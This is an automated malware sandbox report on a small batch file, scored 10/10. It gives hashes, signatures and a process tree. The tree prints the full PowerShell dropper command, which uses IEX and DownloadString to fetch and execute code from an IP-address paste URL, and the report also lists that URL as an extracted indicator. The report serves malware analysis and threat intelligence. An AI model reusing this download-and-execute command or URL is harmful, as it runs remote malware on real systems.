Analysis
  max time kernel: 110s
  max time network: 149s
  platform: windows10_x64
  resource: win10v200217
  submitted: 04-03-2020 00:10

Static task: static1

Behavioral task: behavioral1
  Sample: pHGx3x5F.bat
  Resource: win7v200217 (windows7_x64)
  0 signatures, 0 seconds

Behavioral task: behavioral2
  Sample: pHGx3x5F.bat
  Resource: win10v200217 (windows10_x64)
  0 signatures, 0 seconds
General
  Target: pHGx3x5F.bat
  Size: 189B
  MD5: f8f2d35ab2ca83ab301ef94c9ca2c356
  SHA1: 9f417af220cfe9c60bad058d139354deb8022607
  SHA256: c84e4db88d87029f006dc693c049288c87734e72eb1b2157011efcec833b5360
  SHA512: f35a847580b31883ee57c5762c5805517739d6a2b3b4ea43697518577dddecd2f066fbcb2858d0859ac10d67280ae72bc25d5541a72b7f34469aadd3044378cc
  Score: 10/10
Malware Config
  Extracted
    Language: ps1
    Source: ps1.dropper
    URLs: http://185.103.242.78/pastes/pHGx3x5F
Signatures

  Program crash (1 IoC)
    Processes:
      pid   pid_target  process       target process
      3444  3988        WerFault.exe  powershell.exe

  Suspicious use of AdjustPrivilegeToken (3 IoCs)
    Processes:
      description                pid   process
      Token: SeRestorePrivilege  3444  WerFault.exe
      Token: SeBackupPrivilege   3444  WerFault.exe
      Token: SeDebugPrivilege    3444  WerFault.exe

  Suspicious behavior: EnumeratesProcesses (14 IoCs)
    Processes:
      pid   process
      3444  WerFault.exe (14 occurrences)
Processes

  1. C:\Windows\system32\cmd.exe
     Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\pHGx3x5F.bat"
     PID: 3952

     2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/pHGx3x5F');Invoke-FWRRPX;Start-Sleep -s 10000"
        PID: 3988

        3. C:\Windows\SysWOW64\WerFault.exe
           Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 712
           PID: 3444
           Signatures:
             - Program crash
             - Suspicious use of AdjustPrivilegeToken
             - Suspicious behavior: EnumeratesProcesses